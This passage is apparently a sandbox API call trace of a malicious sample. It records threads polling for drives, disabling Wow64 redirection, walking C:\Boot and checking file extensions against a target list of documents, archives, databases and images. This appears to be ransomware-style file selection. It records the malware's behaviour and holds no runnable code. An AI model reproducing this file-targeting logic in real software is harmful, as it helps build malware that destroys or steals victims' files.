(dwMilliseconds=0x64) [0313.066] GetLogicalDrives () returned 0x4 [0313.066] Sleep (dwMilliseconds=0x64) [0313.619] GetLogicalDrives () returned 0x4 [0313.619] Sleep (dwMilliseconds=0x64) [0313.947] GetLogicalDrives () returned 0x4 [0313.947] Sleep (dwMilliseconds=0x64) [0314.110] GetLogicalDrives () returned 0x4 [0314.110] Sleep (dwMilliseconds=0x64) [0314.450] GetLogicalDrives () returned 0x4 [0314.450] Sleep (dwMilliseconds=0x64) [0315.026] GetLogicalDrives () returned 0x4 [0315.026] Sleep (dwMilliseconds=0x64) [0315.205] GetLogicalDrives () returned 0x4 [0315.205] Sleep (dwMilliseconds=0x64) [0315.332] GetLogicalDrives () returned 0x4 [0315.332] Sleep (dwMilliseconds=0x64) [0315.528] GetLogicalDrives () returned 0x4 [0315.528] Sleep (dwMilliseconds=0x64) [0315.695] GetLogicalDrives () returned 0x4 [0315.695] Sleep (dwMilliseconds=0x64) [0315.984] GetLogicalDrives () returned 0x4 [0315.984] Sleep (dwMilliseconds=0x64) [0316.347] GetLogicalDrives () returned 0x4 [0316.347] Sleep (dwMilliseconds=0x64) [0316.575] GetLogicalDrives () returned 0x4 [0316.575] Sleep (dwMilliseconds=0x64) [0316.860] GetLogicalDrives () returned 0x4 [0316.860] Sleep (dwMilliseconds=0x64) [0317.093] GetLogicalDrives () returned 0x4 [0317.093] Sleep (dwMilliseconds=0x64) [0317.285] GetLogicalDrives () returned 0x4 [0317.285] Sleep (dwMilliseconds=0x64) [0317.498] GetLogicalDrives () returned 0x4 [0317.498] Sleep (dwMilliseconds=0x64) [0317.920] GetLogicalDrives () returned 0x4 [0317.920] Sleep (dwMilliseconds=0x64) [0318.183] GetLogicalDrives () returned 0x4 [0318.183] Sleep (dwMilliseconds=0x64) [0318.420] GetLogicalDrives () returned 0x4 [0318.420] Sleep (dwMilliseconds=0x64) [0318.890] GetLogicalDrives () returned 0x4 [0318.890] Sleep (dwMilliseconds=0x64) [0319.181] GetLogicalDrives () returned 0x4 [0319.181] Sleep (dwMilliseconds=0x64) [0319.863] GetLogicalDrives () returned 0x4 [0319.863] Sleep (dwMilliseconds=0x64) [0320.247] GetLogicalDrives () returned 0x4 [0320.248] Sleep (dwMilliseconds=0x64) [0320.437] GetLogicalDrives () returned 0x4 [0320.437] Sleep (dwMilliseconds=0x64) [0320.676] GetLogicalDrives () returned 0x4 [0320.676] Sleep (dwMilliseconds=0x64) [0321.676] GetLogicalDrives () returned 0x4 [0321.676] Sleep (dwMilliseconds=0x64) Thread: id = 37 os_tid = 0xdf0 [0280.094] GetTickCount () returned 0x113f2a3 [0280.094] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x485550 [0280.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x485550, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0280.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x485550, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0280.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x485550, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0280.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x485550, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0280.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbe80 [0280.097] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cbe80, Size=0x20) returned 0x4adb10 [0280.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cbf58 [0280.097] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cbf58, Size=0x20) returned 0x4adb38 [0280.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.098] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.098] Wow64DisableWow64FsRedirection (in: OldValue=0x284ff7c | out: OldValue=0x284ff7c*=0x0) returned 1 [0280.098] lstrlenW (lpString="kernel32.dll") returned 12 [0280.098] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb10 | out: hHeap=0x470000) returned 1 [0280.098] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.098] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb38 | out: hHeap=0x470000) returned 1 [0280.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x4b6f70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0280.099] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0280.270] GetTickCount () returned 0x113f35f [0280.271] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0282.960] GetTickCount () returned 0x113fdde [0282.960] GetTickCount () returned 0x113fdde [0282.963] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0283.345] GetTickCount () returned 0x113ff55 [0283.345] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0283.518] GetTickCount () returned 0x1140001 [0283.518] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0283.793] GetTickCount () returned 0x114011a [0283.793] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0284.040] GetTickCount () returned 0x1140214 [0284.040] GetTickCount () returned 0x1140214 [0284.040] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0284.331] GetTickCount () returned 0x114032e [0284.333] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0284.490] GetTickCount () returned 0x11403ca [0284.490] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0284.825] GetTickCount () returned 0x1140522 [0284.825] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0285.073] GetTickCount () returned 0x114061c [0285.073] GetTickCount () returned 0x114061c [0285.073] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0285.385] GetTickCount () returned 0x1140754 [0285.385] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0285.703] GetTickCount () returned 0x114088d [0285.703] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0285.966] GetTickCount () returned 0x1140996 [0285.966] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0286.274] GetTickCount () returned 0x1140acf [0286.274] GetTickCount () returned 0x1140acf [0286.274] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0286.453] GetTickCount () returned 0x1140b7b [0286.453] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0286.577] GetTickCount () returned 0x1140bf8 [0286.577] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0287.482] GetTickCount () returned 0x1140f82 [0287.482] GetTickCount () returned 0x1140f82 [0287.482] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0287.672] GetTickCount () returned 0x114103d [0287.672] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0288.057] GetTickCount () returned 0x11411c4 [0288.057] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0288.369] GetTickCount () returned 0x11412fc [0288.369] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0288.716] GetTickCount () returned 0x1141454 [0288.716] GetTickCount () returned 0x1141454 [0288.716] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0289.332] GetTickCount () returned 0x11416c5 [0289.332] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0289.835] GetTickCount () returned 0x11418b9 [0289.835] GetTickCount () returned 0x11418b9 [0289.835] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0290.320] GetTickCount () returned 0x1141a9e [0290.320] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0290.689] GetTickCount () returned 0x1141c05 [0290.689] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0291.072] GetTickCount () returned 0x1141d8c [0291.072] GetTickCount () returned 0x1141d8c [0291.072] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0291.362] GetTickCount () returned 0x1141ea5 [0291.362] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0291.655] GetTickCount () returned 0x1141fce [0291.655] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0292.077] GetTickCount () returned 0x1142174 [0292.077] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0292.335] GetTickCount () returned 0x114227d [0292.335] GetTickCount () returned 0x114227d [0292.335] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0292.551] GetTickCount () returned 0x1142348 [0292.551] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0293.135] GetTickCount () returned 0x114259a [0293.136] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0293.445] GetTickCount () returned 0x11426d3 [0293.446] GetTickCount () returned 0x11426d3 [0293.446] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0293.924] GetTickCount () returned 0x11428a7 [0293.924] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0294.399] GetTickCount () returned 0x1142a8c [0294.399] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0294.946] GetTickCount () returned 0x1142caf [0294.946] GetTickCount () returned 0x1142cbe [0294.961] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0295.509] GetTickCount () returned 0x1142ee1 [0295.509] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0296.004] GetTickCount () returned 0x11430c5 [0296.004] GetTickCount () returned 0x11430c5 [0296.004] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0296.472] GetTickCount () returned 0x114329a [0296.472] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0296.797] GetTickCount () returned 0x11433f2 [0296.797] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0297.241] GetTickCount () returned 0x1143598 [0297.242] GetTickCount () returned 0x1143598 [0297.242] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0297.630] GetTickCount () returned 0x114371e [0297.630] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0298.104] GetTickCount () returned 0x1143903 [0298.104] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0298.627] GetTickCount () returned 0x1143b16 [0298.627] GetTickCount () returned 0x1143b16 [0298.627] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0299.322] GetTickCount () returned 0x1143dc6 [0299.322] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0299.681] GetTickCount () returned 0x1143f2d [0299.681] GetTickCount () returned 0x1143f2d [0299.681] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0300.173] GetTickCount () returned 0x1144111 [0300.173] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0300.422] GetTickCount () returned 0x114420b [0300.422] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0300.677] GetTickCount () returned 0x1144315 [0300.677] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0300.876] GetTickCount () returned 0x11443d0 [0300.876] GetTickCount () returned 0x11443d0 [0300.876] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0301.017] GetTickCount () returned 0x114445d [0301.017] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0301.564] GetTickCount () returned 0x1144680 [0301.564] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0303.536] GetTickCount () returned 0x1144e40 [0303.536] GetTickCount () returned 0x1144e40 [0303.536] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0303.815] GetTickCount () returned 0x1144f5a [0303.815] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0304.029] GetTickCount () returned 0x1145034 [0304.029] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0304.324] GetTickCount () returned 0x114514e [0304.324] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0304.576] GetTickCount () returned 0x1145257 [0304.576] GetTickCount () returned 0x1145257 [0304.576] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0304.878] GetTickCount () returned 0x1145380 [0304.878] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0305.123] GetTickCount () returned 0x114547a [0305.123] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0305.541] GetTickCount () returned 0x1145610 [0305.541] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0305.869] GetTickCount () returned 0x1145758 [0305.869] GetTickCount () returned 0x1145758 [0305.869] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0306.087] GetTickCount () returned 0x1145833 [0306.087] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0306.297] GetTickCount () returned 0x114590e [0306.297] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0306.583] GetTickCount () returned 0x1145a27 [0306.583] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0306.953] GetTickCount () returned 0x1145b9e [0306.953] GetTickCount () returned 0x1145b9e [0306.953] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0307.640] GetTickCount () returned 0x1145e4e [0307.640] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0308.144] GetTickCount () returned 0x1146042 [0308.144] GetTickCount () returned 0x1146042 [0308.144] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0308.475] GetTickCount () returned 0x114618a [0308.475] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0308.823] GetTickCount () returned 0x11462e2 [0308.823] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0309.109] GetTickCount () returned 0x114640a [0309.109] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0309.419] GetTickCount () returned 0x1146543 [0309.420] GetTickCount () returned 0x1146543 [0309.420] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0309.605] GetTickCount () returned 0x11465ef [0309.605] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0310.387] GetTickCount () returned 0x11468fc [0310.387] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0310.714] GetTickCount () returned 0x1146a44 [0310.714] GetTickCount () returned 0x1146a44 [0310.714] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0310.841] GetTickCount () returned 0x1146ac1 [0310.841] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0310.971] GetTickCount () returned 0x1146b3e [0310.971] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.071] GetTickCount () returned 0x1146bac [0311.071] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.181] GetTickCount () returned 0x1146c19 [0311.181] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.339] GetTickCount () returned 0x1146cb5 [0311.339] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.472] GetTickCount () returned 0x1146d32 [0311.473] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.571] GetTickCount () returned 0x1146da0 [0311.571] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.681] GetTickCount () returned 0x1146e0d [0311.681] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0311.789] GetTickCount () returned 0x1146e7a [0311.789] GetTickCount () returned 0x1146e7a [0311.790] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0312.249] GetTickCount () returned 0x114703f [0312.249] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0312.493] GetTickCount () returned 0x1147139 [0312.493] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0312.685] GetTickCount () returned 0x11471f5 [0312.685] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0312.841] GetTickCount () returned 0x1147291 [0312.841] GetTickCount () returned 0x1147291 [0312.841] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0312.952] GetTickCount () returned 0x11472ff [0312.952] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0313.066] GetTickCount () returned 0x114736c [0313.066] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0313.165] GetTickCount () returned 0x11473d9 [0313.165] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0313.663] GetTickCount () returned 0x11475be [0313.663] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0313.948] GetTickCount () returned 0x11476e7 [0313.948] GetTickCount () returned 0x11476e7 [0313.948] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0314.110] GetTickCount () returned 0x1147783 [0314.110] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0314.451] GetTickCount () returned 0x11478db [0314.451] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.027] GetTickCount () returned 0x1147b1d [0315.027] GetTickCount () returned 0x1147b1d [0315.027] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.206] GetTickCount () returned 0x1147bc9 [0315.206] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.341] GetTickCount () returned 0x1147c55 [0315.342] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.528] GetTickCount () returned 0x1147d11 [0315.528] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.696] GetTickCount () returned 0x1147dad [0315.696] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0315.949] GetTickCount () returned 0x1147eb7 [0315.949] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0316.347] GetTickCount () returned 0x114803d [0316.347] GetTickCount () returned 0x114803d [0316.347] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0316.579] GetTickCount () returned 0x1148128 [0316.579] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0316.860] GetTickCount () returned 0x1148241 [0316.860] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0317.096] GetTickCount () returned 0x114832b [0317.096] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0317.285] GetTickCount () returned 0x11483e7 [0317.285] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0317.499] GetTickCount () returned 0x11484c1 [0317.499] GetTickCount () returned 0x11484c1 [0317.499] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0317.920] GetTickCount () returned 0x1148667 [0317.920] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0318.183] GetTickCount () returned 0x1148771 [0318.183] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0318.421] GetTickCount () returned 0x114885b [0318.421] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0318.891] GetTickCount () returned 0x1148a40 [0318.891] GetTickCount () returned 0x1148a40 [0318.891] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0319.182] GetTickCount () returned 0x1148b59 [0319.182] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0319.863] GetTickCount () returned 0x1148e08 [0319.863] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0320.248] GetTickCount () returned 0x1148f7f [0320.248] GetTickCount () returned 0x1148f7f [0320.248] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0320.419] GetTickCount () returned 0x114902b [0320.436] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0320.672] GetTickCount () returned 0x1149125 [0320.672] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0321.672] GetTickCount () returned 0x114950d [0321.672] GetTickCount () returned 0x114950d [0321.672] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) Thread: id = 38 os_tid = 0xdf4 [0280.454] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3860048 [0280.456] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3870050 [0280.458] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc270 [0280.458] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b7c8 [0280.458] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc288 [0280.458] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x396f020 [0280.462] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc2a0 [0280.462] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc2a0, Size=0x20) returned 0x4ae010 [0280.462] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc2a0 [0280.462] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc2a0, Size=0x20) returned 0x4adfe8 [0280.462] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.462] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.463] Wow64DisableWow64FsRedirection (in: OldValue=0x298ff50 | out: OldValue=0x298ff50*=0x0) returned 1 [0280.463] lstrlenW (lpString="kernel32.dll") returned 12 [0280.463] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0280.463] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.463] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adfe8 | out: hHeap=0x470000) returned 1 [0280.463] Sleep (dwMilliseconds=0x64) [0283.210] Sleep (dwMilliseconds=0x64) [0283.509] Sleep (dwMilliseconds=0x64) [0283.791] Sleep (dwMilliseconds=0x64) [0284.039] Sleep (dwMilliseconds=0x64) [0284.313] Sleep (dwMilliseconds=0x64) [0284.490] Sleep (dwMilliseconds=0x64) [0284.819] lstrcmpiW (lpString1=".LOG", lpString2=".MSPLT") returned -1 [0284.819] lstrlenW (lpString="BCD.LOG") returned 7 [0284.819] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.820] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.820] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.820] lstrlenW (lpString=".doc") returned 4 [0284.820] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0284.820] lstrlenW (lpString=".docx") returned 5 [0284.820] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0284.820] lstrlenW (lpString=".pdf") returned 4 [0284.820] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0284.820] lstrlenW (lpString=".xls") returned 4 [0284.820] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0284.820] lstrlenW (lpString=".xlsx") returned 5 [0284.820] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0284.820] lstrlenW (lpString=".ppt") returned 4 [0284.820] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0284.820] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.820] lstrlenW (lpString=".zip") returned 4 [0284.820] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0284.820] lstrlenW (lpString=".rar") returned 4 [0284.820] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0284.820] lstrlenW (lpString=".bz2") returned 4 [0284.820] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0284.820] lstrlenW (lpString=".7z") returned 3 [0284.820] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0284.820] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString=".dbf") returned 4 [0284.821] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0284.821] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString=".1cd") returned 4 [0284.821] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0284.821] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString=".jpg") returned 4 [0284.821] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0284.821] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString=".doc") returned 4 [0284.821] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0284.821] lstrlenW (lpString=".docx") returned 5 [0284.821] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0284.821] lstrlenW (lpString=".pdf") returned 4 [0284.821] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0284.821] lstrlenW (lpString=".xls") returned 4 [0284.821] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0284.821] lstrlenW (lpString=".xlsx") returned 5 [0284.821] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0284.821] lstrlenW (lpString=".ppt") returned 4 [0284.821] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0284.821] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.821] lstrlenW (lpString=".zip") returned 4 [0284.821] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0284.821] lstrlenW (lpString=".rar") returned 4 [0284.822] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0284.822] lstrlenW (lpString=".bz2") returned 4 [0284.822] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0284.822] lstrlenW (lpString=".7z") returned 3 [0284.822] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0284.822] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.822] lstrlenW (lpString=".dbf") returned 4 [0284.822] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0284.822] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.822] lstrlenW (lpString=".1cd") returned 4 [0284.822] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0284.822] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0284.822] lstrlenW (lpString=".jpg") returned 4 [0284.822] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0284.822] Sleep (dwMilliseconds=0x64) [0285.072] Sleep (dwMilliseconds=0x64) [0285.379] lstrcmpiW (lpString1=".p7b", lpString2=".MSPLT") returned 1 [0285.379] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0285.379] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0285.381] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4662) returned 1 [0285.381] CloseHandle 